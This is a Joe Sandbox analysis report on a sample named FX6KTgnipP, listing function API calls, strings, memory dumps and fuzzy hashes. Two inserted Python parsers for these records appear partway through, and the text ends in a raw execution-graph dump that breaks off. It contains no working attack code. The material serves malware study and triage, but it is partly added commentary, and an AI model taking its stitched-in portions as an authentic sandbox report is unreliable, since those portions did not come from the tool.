                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                                            • API String ID: 445417207-3292211884
                                                                                                                                                                            • Opcode ID: 46153d0de2a429db88ad58e59ed745d9079751e785d0eedc10a43d01267f273c
                                                                                                                                                                            • Instruction ID: 04124c4a412184beafd941221356faf87b858e71a8173ab2a9fac01f96391027
                                                                                                                                                                            • Opcode Fuzzy Hash: 46153d0de2a429db88ad58e59ed745d9079751e785d0eedc10a43d01267f273c
                                                                                                                                                                            • Instruction Fuzzy Hash: 501108B266431577D6209F249C89FFB77ACEB8A700F000469F75DA3180C771A8A59675
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00255094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002550B3
                                                                                                                                                                              • Part of subcall function 00255094: GetProcAddress.KERNEL32(002951F8,CryptUnprotectMemory), ref: 002550C3
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000200,?,00255104), ref: 00255197
                                                                                                                                                                            Strings
                                                                                                                                                                            • CryptUnprotectMemory failed, xrefs: 0025518F
                                                                                                                                                                            • CryptProtectMemory failed, xrefs: 0025514E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$CurrentProcess
                                                                                                                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                            • API String ID: 2190909847-396321323
                                                                                                                                                                            • Opcode ID: 73cdc4c2c5b6f87e92923b29d9c4438f9259aa73a7384ec0b9c84279dd316a4b
                                                                                                                                                                            • Instruction ID: 87bc3b9fe6089e689f5f836c098a0861fb4d5006f366b7e3172e9ee449492066
                                                                                                                                                                            • Opcode Fuzzy Hash: 73cdc4c2c5b6f87e92923b29d9c4438f9259aa73a7384ec0b9c84279dd316a4b
                                                                                                                                                                            • Instruction Fuzzy Hash: 32112931A21E35ABDF169F34EC15B6E3F65AF00761B10C01AFC095B281D6709D658BD8
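The record above is the kind of entry an analyst wants to query across the whole listing rather than read one at a time: it shows the sample resolving CryptProtectMemory and CryptUnprotectMemory by name through GetProcAddress instead of importing them, and it carries the strings, API ID and fuzzy hashes used for pivoting. The following Python parser is an added example, not part of the Joe Sandbox report; it turns records in this listing format into dictionaries and answers two such questions (which APIs are resolved at run time via GetProcAddress, and which records contain a given string). SAMPLE is a constructed copy of two records from this page with the page's indentation removed; the field layout it assumes (an APIs block opening each record, bullets prefixed with "•", "ref:" and "xrefs:" suffixes) is what this page shows and may differ in other report versions.

```python
"""Parse Joe Sandbox function records (APIs / Strings / Memory Dump Source /
Similarity blocks) into dicts so a listing can be queried in bulk."""
import re
from typing import Dict, List, Set

# Constructed sample: two records copied from this page, indentation removed.
SAMPLE = """\
APIs
  • Part of subcall function 00255094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002550B3
  • Part of subcall function 00255094: GetProcAddress.KERNEL32(002951F8,CryptUnprotectMemory), ref: 002550C3
• GetCurrentProcessId.KERNEL32(?,00000200,?,00255104), ref: 00255197
Strings
• CryptUnprotectMemory failed, xrefs: 0025518F
• CryptProtectMemory failed, xrefs: 0025514E
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Instruction Fuzzy Hash: 32112931A21E35ABDF169F34EC15B6E3F65AF00761B10C01AFC095B281D6709D658BD8
APIs
• GetCurrentProcess.KERNEL32(00020008,?), ref: 0025FEB6
• GetLastError.KERNEL32 ref: 0025FEE1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: CurrentErrorLastProcess
• String ID: $L&
• API String ID: 335030130-1321513690
"""

# One API line: optional "Part of subcall function <caller>: ", then
# <func>.<module>, an optional "(args)", and a trailing "ref: <addr>".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
STRING_RE = re.compile(r"^(?P<text>.*?), xrefs: (?P<xrefs>.+)$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text: str) -> List[Dict]:
    """Split the listing into records; a record starts at each 'APIs' heading."""
    records: List[Dict] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "source": {}, "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue  # text outside any record, or a non-bullet line
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                rec["apis"].append(m.groupdict())
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                rec["strings"].append({"text": m["text"], "xrefs": m["xrefs"]})
        elif section in ("Memory Dump Source", "Joe Sandbox IDA Plugin"):
            key, _, value = item.partition(": ")
            rec["source"].setdefault(key, []).append(value)  # 'Associated' repeats
        elif section == "Similarity":
            key, _, value = item.partition(": ")
            rec["similarity"][key] = value
    return records


def dynamically_resolved(records: List[Dict]) -> Set[str]:
    """Names passed as a symbolic argument to GetProcAddress, i.e. APIs the
    sample looks up at run time rather than importing. The sandbox prints
    pointer/integer arguments as hex and unknown ones as '?', so any other
    token is a recovered name (ordinal lookups are therefore not reported)."""
    names: Set[str] = set()
    for rec in records:
        for api in rec["apis"]:
            if api["func"] != "GetProcAddress" or not api["args"]:
                continue
            for tok in api["args"].split(","):
                tok = tok.strip()
                if tok and tok != "?" and not HEX_RE.match(tok):
                    names.add(tok)
    return names


def find_by_string(records: List[Dict], needle: str) -> List[int]:
    """Indices of records whose Strings block contains the needle."""
    return [i for i, rec in enumerate(records)
            if any(needle in s["text"] for s in rec["strings"])]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records")
    print("resolved at run time:", sorted(dynamically_resolved(recs)))
    print("records mentioning 'failed':", find_by_string(recs, "failed"))
```

Paste the whole function listing into `parse_records` to get one dict per record; the `similarity` dict then holds the fuzzy hashes and API ID strings for pivoting, and the `source` dict keeps the dump file each function came from.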
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00020008,?), ref: 0025FEB6
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0025FEE1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentErrorLastProcess
                                                                                                                                                                            • String ID: $L&
                                                                                                                                                                            • API String ID: 335030130-1321513690
                                                                                                                                                                            • Opcode ID: 25b955560bbe25a4ace3e734ab13c232bb7d8d4a823f5f887f704f2e9e93703e
                                                                                                                                                                            • Instruction ID: 48c436af7e347c4244c10ce560a0963b4801f82b0fe56b2c4155a50b7d3e23e6
                                                                                                                                                                            • Opcode Fuzzy Hash: 25b955560bbe25a4ace3e734ab13c232bb7d8d4a823f5f887f704f2e9e93703e
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A012D72A64209BFDF115FA0ED49EEE7B6DEB15351F100066FA01D1050D7718E949A64
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(000103E6), ref: 00264291
                                                                                                                                                                            • DialogBoxParamW.USER32(GETPASSWORD1,000103E6,00260110,?), ref: 002642BA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DialogParamVisibleWindow
                                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                                            • API String ID: 3157717868-3292211884
                                                                                                                                                                            • Opcode ID: 5c7ab0215ec400c140cf29caefa55b0af8c71253a2c9553299bc1a60447a3701
                                                                                                                                                                            • Instruction ID: 40218f00121ec0db0d796808c35258f2878e958510a64c81aadb9bbfcb61247d
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7ab0215ec400c140cf29caefa55b0af8c71253a2c9553299bc1a60447a3701
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F01F9303B6725BFCB167F64AC6AE6A37C8AB03310B15815AFC4993191C6B058F4CB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(?,00000001,0025FE90,?), ref: 00263C34
                                                                                                                                                                              • Part of subcall function 00241CC4: GetDlgItem.USER32(?,?), ref: 00241CD2
                                                                                                                                                                              • Part of subcall function 00241CC4: KiUserCallbackDispatcher.NTDLL(00000000), ref: 00241CD9
                                                                                                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00263C6F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherItemMessageSendShowUserWindow
                                                                                                                                                                            • String ID: @U=u
                                                                                                                                                                            • API String ID: 3689821562-2594219639
                                                                                                                                                                            • Opcode ID: 058415428f4fd630a91eb06ddcc27e8fbee426caae17c0f96689cf32ddc04411
                                                                                                                                                                            • Instruction ID: 7cd92bf5ee423d41cf45ab90bedda8e045871bce4f0b67bcad6c2f5636a20293
                                                                                                                                                                            • Opcode Fuzzy Hash: 058415428f4fd630a91eb06ddcc27e8fbee426caae17c0f96689cf32ddc04411
                                                                                                                                                                            • Instruction Fuzzy Hash: 1AF0A530668751BAEB228B24FC4EB957AA1B710715F14445BB245280F1C3F644E8CB06
                                                                                                                                                                            APIs
                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00265379
                                                                                                                                                                              • Part of subcall function 002652FB: std::exception::exception.LIBCONCRT ref: 00265308
                                                                                                                                                                              • Part of subcall function 0026734A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0026536C,?,hTl(,?), ref: 002673AA
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0026539F
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionRaise$AccessDloadHelper2@8LoadReleaseSectionWrite___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: @Uxu
                                                                                                                                                                            • API String ID: 1552410523-397286711
                                                                                                                                                                            • Opcode ID: ca1dc02c74295731213ab91994c73873d2628fc652a716ddeed04321d6e5b39e
                                                                                                                                                                            • Instruction ID: 8ba341640e5010692adb0cc056b3d85f3a78c5ae043e5a757f4301a484d1adc2
                                                                                                                                                                            • Opcode Fuzzy Hash: ca1dc02c74295731213ab91994c73873d2628fc652a716ddeed04321d6e5b39e
                                                                                                                                                                            • Instruction Fuzzy Hash: CBD05B6997C10CBA9704B690DC1BD7E372CD941700F204465BD40D15C5EAA095B44AA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,0025770A,?,?,0025777F,?,?,?,?,?,00257769), ref: 002575F3
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0025777F,?,?,?,?,?,00257769), ref: 002575FF
                                                                                                                                                                              • Part of subcall function 002492EB: __EH_prolog3_GS.LIBCMT ref: 002492F2
                                                                                                                                                                            Strings
                                                                                                                                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00257608
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                                                                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                            • API String ID: 2419225763-2248577382
                                                                                                                                                                            • Opcode ID: 0f03dc1cd2fdb58c629b0df650595922c5ff9167eb70a95772d20d096f463141
                                                                                                                                                                            • Instruction ID: c1aefa0646ea9a6328b590acc4c85aac94ea8826a66a203b7b321e6e78b17a40
                                                                                                                                                                            • Opcode Fuzzy Hash: 0f03dc1cd2fdb58c629b0df650595922c5ff9167eb70a95772d20d096f463141
                                                                                                                                                                            • Instruction Fuzzy Hash: D5D05E31559421BBD91437797C0ECAF391D9F22731F610718FA3C652E5DA6009E146ED
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,6294DA82), ref: 00253E65
                                                                                                                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00253E73
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindHandleModuleResource
                                                                                                                                                                            • String ID: RTL
                                                                                                                                                                            • API String ID: 3537982541-834975271
                                                                                                                                                                            • Opcode ID: 5799fed4282f02a17e1f14625806290e55ff1668cc0326daa83cdcbf6932f60d
                                                                                                                                                                            • Instruction ID: f42ab5666c173c07daf17fde3887d4d8207248a2384136778b8e84d995b32fba
                                                                                                                                                                            • Opcode Fuzzy Hash: 5799fed4282f02a17e1f14625806290e55ff1668cc0326daa83cdcbf6932f60d
                                                                                                                                                                            • Instruction Fuzzy Hash: 09C0803175031096E73417717C0DB432D986F15755F15045CB90D990C0D5F5D4908BD0
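                                                                                                                                                                             The function blocks above all follow one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them easy to pull into structured form for triage: for example, listing every function that reaches RaiseException or __EH_prolog3_GS only through a subcall, or deduplicating functions by Opcode ID across reports. The parser below is an added example and is not code from Joe Sandbox or from this report. Its sample input is two blocks copied from this page (constructed and abbreviated for the example), and the section names, regexes and record fields are assumptions derived from the visible layout, not from any published Joe Sandbox schema.

```python
"""Parse Joe Sandbox per-function analysis blocks into structured records.

Added example; not Joe Sandbox code. The regexes and field names below are
assumptions derived from the visible report layout, not a published schema.
"""
import json
import re

# Constructed sample: two function blocks in the layout the report uses.
SAMPLE = """\
APIs
• IsWindowVisible.USER32(000103E6), ref: 00264291
• DialogBoxParamW.USER32(GETPASSWORD1,000103E6,00260110,?), ref: 002642BA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: DialogParamVisibleWindow
• String ID: GETPASSWORD1
• Opcode ID: 5c7ab0215ec400c140cf29caefa55b0af8c71253a2c9553299bc1a60447a3701
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,0025770A,?,?,0025777F,?,?,?,?,?,00257769), ref: 002575F3
• GetLastError.KERNEL32(?,?,0025777F,?,?,?,?,?,00257769), ref: 002575FF
  • Part of subcall function 002492EB: __EH_prolog3_GS.LIBCMT ref: 002492F2
Strings
• WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00257608
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: ErrorH_prolog3_LastObjectSingleWait
• Opcode ID: 0f03dc1cd2fdb58c629b0df650595922c5ff9167eb70a95772d20d096f463141
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Matches both "GetLastError.KERNEL32 ref: 0025FEE1" (no argument list) and
# "DialogBoxParamW.USER32(a,b,?), ref: 002642BA". Names may contain "::" and "@".
API_RE = re.compile(r"^(?P<name>[\w:@~]+)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+): (?P<rest>.*)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-Fa-f, ]+)$")
SOURCE_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)$")
KEYVAL_RE = re.compile(r"^(?P<key>[^:]+): (?P<value>.*)$")


def parse_api(text):
    """Parse one API bullet; subcall lines record the parent function address."""
    subcall_of = None
    m = SUBCALL_RE.match(text)
    if m:
        subcall_of, text = m["func"], m["rest"]
    m = API_RE.match(text)
    if not m:
        return None
    args = m["args"]
    return {"name": m["name"], "module": m["module"],
            "args": args.split(",") if args is not None else [],
            "ref": m["ref"], "subcall_of": subcall_of}


def parse_blocks(report_text):
    """Split the text into function blocks (each opens with 'APIs') and parse them."""
    blocks, block, section = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":  # every function block opens with its API list
                block = {"apis": [], "strings": [], "source": None, "associated": [], "meta": {}}
                blocks.append(block)
            section = line
            continue
        if block is None or not line.startswith("•"):
            continue  # text outside any block, or a non-bullet line
        text = line.lstrip("•").strip()
        if section == "APIs":
            api = parse_api(text)
            if api:
                block["apis"].append(api)
        elif section == "Strings":
            m = STRING_RE.match(text)
            if m:
                block["strings"].append({"text": m["text"],
                                         "xrefs": [x for x in re.split(r"[,\s]+", m["xrefs"]) if x]})
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(text)
            if m:
                block["source"] = {"file": m["file"], "offset": m["offset"], "based_on_pe": m["pe"] == "true"}
            elif text.startswith("Associated: "):
                block["associated"].append(text[len("Associated: "):])
        else:  # "Joe Sandbox IDA Plugin" and "Similarity" are plain key/value pairs
            m = KEYVAL_RE.match(text)
            if m:
                block["meta"][m["key"]] = m["value"]
    return blocks


def api_chain(block):
    """Direct calls of one function as MODULE!Name, in report order (subcalls excluded)."""
    return [f"{a['module']}!{a['name']}" for a in block["apis"] if a["subcall_of"] is None]


def functions_calling(blocks, api_name, include_subcalls=True):
    """Opcode IDs of the functions that call api_name, optionally via subcalls."""
    hits = []
    for b in blocks:
        if any(a["name"] == api_name and (include_subcalls or a["subcall_of"] is None)
               for a in b["apis"]):
            hits.append(b["meta"].get("Opcode ID"))
    return hits


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    print(json.dumps(parsed, indent=2))
    print("via subcall:", functions_calling(parsed, "__EH_prolog3_GS"))
```

                                                                                                                                                                             Run it on a saved copy of the report text instead of SAMPLE to get one JSON record per function; the Opcode ID and Instruction Fuzzy Hash fields in "meta" are the natural keys for matching functions between this report and other samples.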

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:3.7%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:1.8%
                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                            Total number of Limit Nodes:57
                                                                                                                                                                             execution_graph: node and edge listing of the rendered execution graph (2000 nodes, 57 limit nodes). The graph image itself is not recoverable from the text and the listing is cut off in the source. Recoverable detail: node addresses fall in the 851044 to 8d60a2 range; annotated nodes call RegisterWindowMessageW (8531d8), EnterCriticalSection / LeaveCriticalSection / SetEvent / ResetEvent (870588), __Init_thread_wait with EnterCriticalSection / LeaveCriticalSection / WaitForSingleObjectEx (8705d2), RaiseException (873634), and the runtime helpers __fread_nolock, _wcslen, ___std_exception_copy, __wsopen_s (8c3ef6, 81 API calls) and pre_c_initialization (870433, 29 API calls).
ResetEvent __Init_thread_footer 99072->99073 99075 860a5e ISource 99072->99075 99089 861e00 99072->99089 99099 861940 253 API calls 2 library calls 99072->99099 99073->99072 99101 8c3ef6 81 API calls __wsopen_s 99075->99101 99076->99021 99077->99021 99078->99029 99079->99031 99081 85be90 __fread_nolock 99080->99081 99082 85be81 99080->99082 99081->99041 99082->99081 99083 87019b 8 API calls 99082->99083 99083->99081 99086 85c78b ISource 99084->99086 99085 85c7c6 ISource 99085->99049 99086->99085 99088 86e29c 8 API calls ISource 99086->99088 99088->99085 99095 861e1d ISource 99089->99095 99090 8624c2 99096 861fa7 ISource 99090->99096 99107 86bd82 39 API calls 99090->99107 99093 8a77db 99093->99096 99106 87d2f5 39 API calls 99093->99106 99095->99090 99095->99093 99095->99096 99098 8a760f 99095->99098 99105 86e29c 8 API calls ISource 99095->99105 99096->99072 99104 87d2f5 39 API calls 99098->99104 99099->99072 99100->99075 99101->99070 99102->99070 99103->99070 99104->99098 99105->99095 99106->99096 99107->99096 99108 85f48c 99111 85ca50 99108->99111 99112 85ca6b 99111->99112 99113 8a14af 99112->99113 99114 8a1461 99112->99114 99139 85ca90 99112->99139 99156 8d61ff 253 API calls 2 library calls 99113->99156 99117 8a146b 99114->99117 99119 8a1478 99114->99119 99114->99139 99154 8d6690 253 API calls 99117->99154 99136 85cd60 99119->99136 99155 8d6b2d 253 API calls 2 library calls 99119->99155 99124 85cf30 39 API calls 99124->99139 99125 8a1742 99125->99125 99128 8a168b 99159 8d6569 81 API calls 99128->99159 99132 85cd8e 99136->99132 99160 8c3ef6 81 API calls __wsopen_s 99136->99160 99137 86e781 39 API calls 99137->99139 99138 8602f0 253 API calls 99138->99139 99139->99124 99139->99128 99139->99132 99139->99136 99139->99137 99139->99138 99140 85be6d 8 API calls 99139->99140 99142 85bdc1 99139->99142 99146 86e73b 39 API calls 99139->99146 99147 86aa19 253 API calls 99139->99147 99148 8705d2 5 API calls __Init_thread_wait 99139->99148 99149 86bbd2 8 API calls 99139->99149 
